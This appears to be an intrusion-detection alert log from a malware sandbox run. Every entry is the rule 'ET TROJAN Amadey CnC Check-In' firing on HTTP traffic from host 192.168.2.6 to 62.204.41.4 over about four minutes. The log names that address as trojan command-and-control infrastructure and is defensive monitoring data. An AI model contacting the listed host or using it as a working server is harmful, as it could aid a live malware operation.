192.168.2.662.204.41.450333802027700 02/07/23-20:03:42.674478	TCP	2027700	ET TROJAN Amadey CnC Check-In	50333	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450235802027700 02/07/23-20:03:16.065619	TCP	2027700	ET TROJAN Amadey CnC Check-In	50235	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450431802027700 02/07/23-20:04:06.742108	TCP	2027700	ET TROJAN Amadey CnC Check-In	50431	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449910802027700 02/07/23-20:01:41.844449	TCP	2027700	ET TROJAN Amadey CnC Check-In	49910	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449977802027700 02/07/23-20:02:01.710756	TCP	2027700	ET TROJAN Amadey CnC Check-In	49977	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449723802027700 02/07/23-20:00:52.073819	TCP	2027700	ET TROJAN Amadey CnC Check-In	49723	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449879802027700 02/07/23-20:01:34.335804	TCP	2027700	ET TROJAN Amadey CnC Check-In	49879	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449821802027700 02/07/23-20:01:17.548025	TCP	2027700	ET TROJAN Amadey CnC Check-In	49821	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449812802027700 02/07/23-20:01:15.578134	TCP	2027700	ET TROJAN Amadey CnC Check-In	49812	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449968802027700 02/07/23-20:01:59.735492	TCP	2027700	ET TROJAN Amadey CnC Check-In	49968	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449770802027700 02/07/23-20:01:03.285971	TCP	2027700	ET TROJAN Amadey CnC Check-In	49770	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449767802027700 02/07/23-20:01:02.575091	TCP	2027700	ET TROJAN Amadey CnC Check-In	49767	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449882802027700 02/07/23-20:01:34.875626	TCP	2027700	ET TROJAN Amadey CnC Check-In	49882	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450440802027700 02/07/23-20:04:08.934141	TCP	2027700	ET TROJAN Amadey CnC Check-In	50440	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450291802027700 02/07/23-20:03:32.300203	TCP	2027700	ET TROJAN Amadey CnC Check-In	50291	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449971802027700 02/07/23-20:02:00.459434	TCP	2027700	ET TROJAN Amadey CnC Check-In	49971	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450244802027700 02/07/23-20:03:18.251405	TCP	2027700	ET TROJAN Amadey CnC Check-In	50244	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450429802027700 02/07/23-20:04:06.205613	TCP	2027700	ET TROJAN Amadey CnC Check-In	50429	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450339802027700 02/07/23-20:03:44.150750	TCP	2027700	ET TROJAN Amadey CnC Check-In	50339	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450043802027700 02/07/23-20:02:21.535774	TCP	2027700	ET TROJAN Amadey CnC Check-In	50043	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450297802027700 02/07/23-20:03:33.829768	TCP	2027700	ET TROJAN Amadey CnC Check-In	50297	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450132802027700 02/07/23-20:02:51.157888	TCP	2027700	ET TROJAN Amadey CnC Check-In	50132	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450173802027700 02/07/23-20:03:01.155358	TCP	2027700	ET TROJAN Amadey CnC Check-In	50173	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450386802027700 02/07/23-20:03:55.723368	TCP	2027700	ET TROJAN Amadey CnC Check-In	50386	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450216802027700 02/07/23-20:03:11.470014	TCP	2027700	ET TROJAN Amadey CnC Check-In	50216	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450428802027700 02/07/23-20:04:05.975695	TCP	2027700	ET TROJAN Amadey CnC Check-In	50428	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450084802027700 02/07/23-20:02:35.626446	TCP	2027700	ET TROJAN Amadey CnC Check-In	50084	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449952802027700 02/07/23-20:01:55.791186	TCP	2027700	ET TROJAN Amadey CnC Check-In	49952	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450412802027700 02/07/23-20:04:02.064925	TCP	2027700	ET TROJAN Amadey CnC Check-In	50412	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449911802027700 02/07/23-20:01:42.093950	TCP	2027700	ET TROJAN Amadey CnC Check-In	49911	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450305802027700 02/07/23-20:03:35.785500	TCP	2027700	ET TROJAN Amadey CnC Check-In	50305	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449751802027700 02/07/23-20:00:58.872163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49751	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449840802027700 02/07/23-20:01:22.187785	TCP	2027700	ET TROJAN Amadey CnC Check-In	49840	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449898802027700 02/07/23-20:01:38.811965	TCP	2027700	ET TROJAN Amadey CnC Check-In	49898	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450399802027700 02/07/23-20:03:58.878195	TCP	2027700	ET TROJAN Amadey CnC Check-In	50399	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450047802027700 02/07/23-20:02:22.518279	TCP	2027700	ET TROJAN Amadey CnC Check-In	50047	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450145802027700 02/07/23-20:02:54.357855	TCP	2027700	ET TROJAN Amadey CnC Check-In	50145	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450231802027700 02/07/23-20:03:15.107613	TCP	2027700	ET TROJAN Amadey CnC Check-In	50231	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450056802027700 02/07/23-20:02:24.870217	TCP	2027700	ET TROJAN Amadey CnC Check-In	50056	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450228802027700 02/07/23-20:03:14.349981	TCP	2027700	ET TROJAN Amadey CnC Check-In	50228	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450062802027700 02/07/23-20:02:28.090658	TCP	2027700	ET TROJAN Amadey CnC Check-In	50062	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450317802027700 02/07/23-20:03:38.748560	TCP	2027700	ET TROJAN Amadey CnC Check-In	50317	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450219802027700 02/07/23-20:03:12.179097	TCP	2027700	ET TROJAN Amadey CnC Check-In	50219	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449838802027700 02/07/23-20:01:21.703798	TCP	2027700	ET TROJAN Amadey CnC Check-In	49838	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450457802027700 02/07/23-20:04:13.065112	TCP	2027700	ET TROJAN Amadey CnC Check-In	50457	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449936802027700 02/07/23-20:01:51.820246	TCP	2027700	ET TROJAN Amadey CnC Check-In	49936	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450301802027700 02/07/23-20:03:34.801016	TCP	2027700	ET TROJAN Amadey CnC Check-In	50301	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450203802027700 02/07/23-20:03:08.264782	TCP	2027700	ET TROJAN Amadey CnC Check-In	50203	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449853802027700 02/07/23-20:01:25.706873	TCP	2027700	ET TROJAN Amadey CnC Check-In	49853	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449894802027700 02/07/23-20:01:37.843818	TCP	2027700	ET TROJAN Amadey CnC Check-In	49894	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449755802027700 02/07/23-20:00:59.855021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49755	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449927802027700 02/07/23-20:01:49.659609	TCP	2027700	ET TROJAN Amadey CnC Check-In	49927	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450288802027700 02/07/23-20:03:31.578001	TCP	2027700	ET TROJAN Amadey CnC Check-In	50288	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450158802027700 02/07/23-20:02:57.529246	TCP	2027700	ET TROJAN Amadey CnC Check-In	50158	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450383802027700 02/07/23-20:03:54.971539	TCP	2027700	ET TROJAN Amadey CnC Check-In	50383	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449764802027700 02/07/23-20:01:01.795053	TCP	2027700	ET TROJAN Amadey CnC Check-In	49764	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450028802027700 02/07/23-20:02:17.895696	TCP	2027700	ET TROJAN Amadey CnC Check-In	50028	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450342802027700 02/07/23-20:03:44.892172	TCP	2027700	ET TROJAN Amadey CnC Check-In	50342	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449980802027700 02/07/23-20:02:02.464633	TCP	2027700	ET TROJAN Amadey CnC Check-In	49980	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450472802027700 02/07/23-20:04:16.721903	TCP	2027700	ET TROJAN Amadey CnC Check-In	50472	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450075802027700 02/07/23-20:02:33.175281	TCP	2027700	ET TROJAN Amadey CnC Check-In	50075	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450117802027700 02/07/23-20:02:44.156964	TCP	2027700	ET TROJAN Amadey CnC Check-In	50117	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450199802027700 02/07/23-20:03:07.326755	TCP	2027700	ET TROJAN Amadey CnC Check-In	50199	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450034802027700 02/07/23-20:02:19.362339	TCP	2027700	ET TROJAN Amadey CnC Check-In	50034	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450247802027700 02/07/23-20:03:18.979917	TCP	2027700	ET TROJAN Amadey CnC Check-In	50247	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450314802027700 02/07/23-20:03:38.017064	TCP	2027700	ET TROJAN Amadey CnC Check-In	50314	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449949802027700 02/07/23-20:01:55.074452	TCP	2027700	ET TROJAN Amadey CnC Check-In	49949	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450444802027700 02/07/23-20:04:09.894977	TCP	2027700	ET TROJAN Amadey CnC Check-In	50444	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450403802027700 02/07/23-20:03:59.851322	TCP	2027700	ET TROJAN Amadey CnC Check-In	50403	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449908802027700 02/07/23-20:01:41.349767	TCP	2027700	ET TROJAN Amadey CnC Check-In	49908	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449866802027700 02/07/23-20:01:31.109835	TCP	2027700	ET TROJAN Amadey CnC Check-In	49866	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450320802027700 02/07/23-20:03:39.480009	TCP	2027700	ET TROJAN Amadey CnC Check-In	50320	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449736802027700 02/07/23-20:00:55.230834	TCP	2027700	ET TROJAN Amadey CnC Check-In	49736	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449783802027700 02/07/23-20:01:06.638994	TCP	2027700	ET TROJAN Amadey CnC Check-In	49783	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449996802027700 02/07/23-20:02:09.912452	TCP	2027700	ET TROJAN Amadey CnC Check-In	49996	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449825802027700 02/07/23-20:01:18.559732	TCP	2027700	ET TROJAN Amadey CnC Check-In	49825	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449742802027700 02/07/23-20:00:56.667263	TCP	2027700	ET TROJAN Amadey CnC Check-In	49742	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449955802027700 02/07/23-20:01:56.500323	TCP	2027700	ET TROJAN Amadey CnC Check-In	49955	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450018802027700 02/07/23-20:02:15.452445	TCP	2027700	ET TROJAN Amadey CnC Check-In	50018	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450309802027700 02/07/23-20:03:36.772736	TCP	2027700	ET TROJAN Amadey CnC Check-In	50309	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449947802027700 02/07/23-20:01:54.584701	TCP	2027700	ET TROJAN Amadey CnC Check-In	49947	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450082802027700 02/07/23-20:02:34.890335	TCP	2027700	ET TROJAN Amadey CnC Check-In	50082	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450214802027700 02/07/23-20:03:10.972258	TCP	2027700	ET TROJAN Amadey CnC Check-In	50214	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449993802027700 02/07/23-20:02:07.121549	TCP	2027700	ET TROJAN Amadey CnC Check-In	49993	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450355802027700 02/07/23-20:03:48.094654	TCP	2027700	ET TROJAN Amadey CnC Check-In	50355	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450471802027700 02/07/23-20:04:16.488079	TCP	2027700	ET TROJAN Amadey CnC Check-In	50471	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449852802027700 02/07/23-20:01:25.383304	TCP	2027700	ET TROJAN Amadey CnC Check-In	49852	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450003802027700 02/07/23-20:02:11.648732	TCP	2027700	ET TROJAN Amadey CnC Check-In	50003	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450453802027700 02/07/23-20:04:12.107650	TCP	2027700	ET TROJAN Amadey CnC Check-In	50453	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449929802027700 02/07/23-20:01:50.134882	TCP	2027700	ET TROJAN Amadey CnC Check-In	49929	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450177802027700 02/07/23-20:03:02.166311	TCP	2027700	ET TROJAN Amadey CnC Check-In	50177	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450275802027700 02/07/23-20:03:28.403496	TCP	2027700	ET TROJAN Amadey CnC Check-In	50275	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449965802027700 02/07/23-20:01:59.016140	TCP	2027700	ET TROJAN Amadey CnC Check-In	49965	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450293802027700 02/07/23-20:03:32.801081	TCP	2027700	ET TROJAN Amadey CnC Check-In	50293	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450327802027700 02/07/23-20:03:41.188880	TCP	2027700	ET TROJAN Amadey CnC Check-In	50327	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449806802027700 02/07/23-20:01:14.154494	TCP	2027700	ET TROJAN Amadey CnC Check-In	49806	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450425802027700 02/07/23-20:04:05.253501	TCP	2027700	ET TROJAN Amadey CnC Check-In	50425	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450097802027700 02/07/23-20:02:39.099671	TCP	2027700	ET TROJAN Amadey CnC Check-In	50097	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449769802027700 02/07/23-20:01:03.043961	TCP	2027700	ET TROJAN Amadey CnC Check-In	49769	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450410802027700 02/07/23-20:04:01.580414	TCP	2027700	ET TROJAN Amadey CnC Check-In	50410	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450054802027700 02/07/23-20:02:24.270996	TCP	2027700	ET TROJAN Amadey CnC Check-In	50054	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449787802027700 02/07/23-20:01:09.515244	TCP	2027700	ET TROJAN Amadey CnC Check-In	49787	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450388802027700 02/07/23-20:03:56.189946	TCP	2027700	ET TROJAN Amadey CnC Check-In	50388	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450036802027700 02/07/23-20:02:19.847586	TCP	2027700	ET TROJAN Amadey CnC Check-In	50036	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450092802027700 02/07/23-20:02:37.868052	TCP	2027700	ET TROJAN Amadey CnC Check-In	50092	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450232802027700 02/07/23-20:03:15.344051	TCP	2027700	ET TROJAN Amadey CnC Check-In	50232	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449957802027700 02/07/23-20:01:56.989416	TCP	2027700	ET TROJAN Amadey CnC Check-In	49957	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450031802027700 02/07/23-20:02:18.637614	TCP	2027700	ET TROJAN Amadey CnC Check-In	50031	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450250802027700 02/07/23-20:03:19.754500	TCP	2027700	ET TROJAN Amadey CnC Check-In	50250	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449862802027700 02/07/23-20:01:30.125467	TCP	2027700	ET TROJAN Amadey CnC Check-In	49862	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450481802027700 02/07/23-20:04:18.893120	TCP	2027700	ET TROJAN Amadey CnC Check-In	50481	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450072802027700 02/07/23-20:02:32.475919	TCP	2027700	ET TROJAN Amadey CnC Check-In	50072	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449779802027700 02/07/23-20:01:05.232360	TCP	2027700	ET TROJAN Amadey CnC Check-In	49779	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449870802027700 02/07/23-20:01:32.078335	TCP	2027700	ET TROJAN Amadey CnC Check-In	49870	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449998802027700 02/07/23-20:02:10.416841	TCP	2027700	ET TROJAN Amadey CnC Check-In	49998	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450108802027700 02/07/23-20:02:41.932133	TCP	2027700	ET TROJAN Amadey CnC Check-In	50108	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450149802027700 02/07/23-20:02:55.389818	TCP	2027700	ET TROJAN Amadey CnC Check-In	50149	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450026802027700 02/07/23-20:02:17.408058	TCP	2027700	ET TROJAN Amadey CnC Check-In	50026	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449975802027700 02/07/23-20:02:01.204512	TCP	2027700	ET TROJAN Amadey CnC Check-In	49975	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450222802027700 02/07/23-20:03:12.933465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50222	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449797802027700 02/07/23-20:01:12.000477	TCP	2027700	ET TROJAN Amadey CnC Check-In	49797	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450204802027700 02/07/23-20:03:08.498529	TCP	2027700	ET TROJAN Amadey CnC Check-In	50204	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450398802027700 02/07/23-20:03:58.636270	TCP	2027700	ET TROJAN Amadey CnC Check-In	50398	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449834802027700 02/07/23-20:01:20.722458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49834	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450400802027700 02/07/23-20:03:59.133077	TCP	2027700	ET TROJAN Amadey CnC Check-In	50400	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450008802027700 02/07/23-20:02:12.917280	TCP	2027700	ET TROJAN Amadey CnC Check-In	50008	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449811802027700 02/07/23-20:01:15.342261	TCP	2027700	ET TROJAN Amadey CnC Check-In	49811	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450044802027700 02/07/23-20:02:21.772716	TCP	2027700	ET TROJAN Amadey CnC Check-In	50044	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450393802027700 02/07/23-20:03:57.421090	TCP	2027700	ET TROJAN Amadey CnC Check-In	50393	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450041802027700 02/07/23-20:02:21.067703	TCP	2027700	ET TROJAN Amadey CnC Check-In	50041	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449967802027700 02/07/23-20:01:59.487215	TCP	2027700	ET TROJAN Amadey CnC Check-In	49967	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449909802027700 02/07/23-20:01:41.612708	TCP	2027700	ET TROJAN Amadey CnC Check-In	49909	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450237802027700 02/07/23-20:03:16.563327	TCP	2027700	ET TROJAN Amadey CnC Check-In	50237	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449860802027700 02/07/23-20:01:29.628066	TCP	2027700	ET TROJAN Amadey CnC Check-In	49860	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450252802027700 02/07/23-20:03:20.248979	TCP	2027700	ET TROJAN Amadey CnC Check-In	50252	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450415802027700 02/07/23-20:04:02.837203	TCP	2027700	ET TROJAN Amadey CnC Check-In	50415	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449789802027700 02/07/23-20:01:10.000649	TCP	2027700	ET TROJAN Amadey CnC Check-In	49789	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450160802027700 02/07/23-20:02:58.000084	TCP	2027700	ET TROJAN Amadey CnC Check-In	50160	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450430802027700 02/07/23-20:04:06.494424	TCP	2027700	ET TROJAN Amadey CnC Check-In	50430	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449832802027700 02/07/23-20:01:20.240759	TCP	2027700	ET TROJAN Amadey CnC Check-In	49832	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450451802027700 02/07/23-20:04:11.626762	TCP	2027700	ET TROJAN Amadey CnC Check-In	50451	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450013802027700 02/07/23-20:02:14.205368	TCP	2027700	ET TROJAN Amadey CnC Check-In	50013	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450016802027700 02/07/23-20:02:14.953404	TCP	2027700	ET TROJAN Amadey CnC Check-In	50016	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450365802027700 02/07/23-20:03:50.517630	TCP	2027700	ET TROJAN Amadey CnC Check-In	50365	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450074802027700 02/07/23-20:02:32.940709	TCP	2027700	ET TROJAN Amadey CnC Check-In	50074	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449924802027700 02/07/23-20:01:46.876099	TCP	2027700	ET TROJAN Amadey CnC Check-In	49924	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449939802027700 02/07/23-20:01:52.546117	TCP	2027700	ET TROJAN Amadey CnC Check-In	49939	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450273802027700 02/07/23-20:03:27.900257	TCP	2027700	ET TROJAN Amadey CnC Check-In	50273	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450329802027700 02/07/23-20:03:41.705909	TCP	2027700	ET TROJAN Amadey CnC Check-In	50329	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450059802027700 02/07/23-20:02:26.009359	TCP	2027700	ET TROJAN Amadey CnC Check-In	50059	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449746802027700 02/07/23-20:00:57.646912	TCP	2027700	ET TROJAN Amadey CnC Check-In	49746	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450224802027700 02/07/23-20:03:13.408043	TCP	2027700	ET TROJAN Amadey CnC Check-In	50224	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449865802027700 02/07/23-20:01:30.873059	TCP	2027700	ET TROJAN Amadey CnC Check-In	49865	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449824802027700 02/07/23-20:01:18.327900	TCP	2027700	ET TROJAN Amadey CnC Check-In	49824	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450005802027700 02/07/23-20:02:12.152880	TCP	2027700	ET TROJAN Amadey CnC Check-In	50005	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450187802027700 02/07/23-20:03:04.340649	TCP	2027700	ET TROJAN Amadey CnC Check-In	50187	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449995802027700 02/07/23-20:02:09.662326	TCP	2027700	ET TROJAN Amadey CnC Check-In	49995	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449784802027700 02/07/23-20:01:06.918802	TCP	2027700	ET TROJAN Amadey CnC Check-In	49784	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450146802027700 02/07/23-20:02:54.625344	TCP	2027700	ET TROJAN Amadey CnC Check-In	50146	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450265802027700 02/07/23-20:03:25.941004	TCP	2027700	ET TROJAN Amadey CnC Check-In	50265	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450443802027700 02/07/23-20:04:09.644630	TCP	2027700	ET TROJAN Amadey CnC Check-In	50443	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450402802027700 02/07/23-20:03:59.613926	TCP	2027700	ET TROJAN Amadey CnC Check-In	50402	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449759802027700 02/07/23-20:01:00.829527	TCP	2027700	ET TROJAN Amadey CnC Check-In	49759	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450087802027700 02/07/23-20:02:36.507624	TCP	2027700	ET TROJAN Amadey CnC Check-In	50087	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450290802027700 02/07/23-20:03:32.058144	TCP	2027700	ET TROJAN Amadey CnC Check-In	50290	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450378802027700 02/07/23-20:03:53.744252	TCP	2027700	ET TROJAN Amadey CnC Check-In	50378	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449978802027700 02/07/23-20:02:01.964465	TCP	2027700	ET TROJAN Amadey CnC Check-In	49978	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449890802027700 02/07/23-20:01:36.846820	TCP	2027700	ET TROJAN Amadey CnC Check-In	49890	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450159802027700 02/07/23-20:02:57.764941	TCP	2027700	ET TROJAN Amadey CnC Check-In	50159	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450118802027700 02/07/23-20:02:44.402579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50118	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450337802027700 02/07/23-20:03:43.661817	TCP	2027700	ET TROJAN Amadey CnC Check-In	50337	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449937802027700 02/07/23-20:01:52.063127	TCP	2027700	ET TROJAN Amadey CnC Check-In	49937	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450046802027700 02/07/23-20:02:22.274271	TCP	2027700	ET TROJAN Amadey CnC Check-In	50046	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449718802027700 02/07/23-20:00:50.878461	TCP	2027700	ET TROJAN Amadey CnC Check-In	49718	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450260802027700 02/07/23-20:03:22.605985	TCP	2027700	ET TROJAN Amadey CnC Check-In	50260	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450306802027700 02/07/23-20:03:36.017602	TCP	2027700	ET TROJAN Amadey CnC Check-In	50306	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450300802027700 02/07/23-20:03:34.563838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50300	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450211802027700 02/07/23-20:03:10.237661	TCP	2027700	ET TROJAN Amadey CnC Check-In	50211	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450122802027700 02/07/23-20:02:45.389628	TCP	2027700	ET TROJAN Amadey CnC Check-In	50122	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450474802027700 02/07/23-20:04:17.216226	TCP	2027700	ET TROJAN Amadey CnC Check-In	50474	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449794802027700 02/07/23-20:01:11.263709	TCP	2027700	ET TROJAN Amadey CnC Check-In	49794	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449766802027700 02/07/23-20:01:02.341785	TCP	2027700	ET TROJAN Amadey CnC Check-In	49766	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449944802027700 02/07/23-20:01:53.792362	TCP	2027700	ET TROJAN Amadey CnC Check-In	49944	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449855802027700 02/07/23-20:01:26.978024	TCP	2027700	ET TROJAN Amadey CnC Check-In	49855	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449883802027700 02/07/23-20:01:35.109836	TCP	2027700	ET TROJAN Amadey CnC Check-In	49883	80	192.168.2.6	62.204.41.4
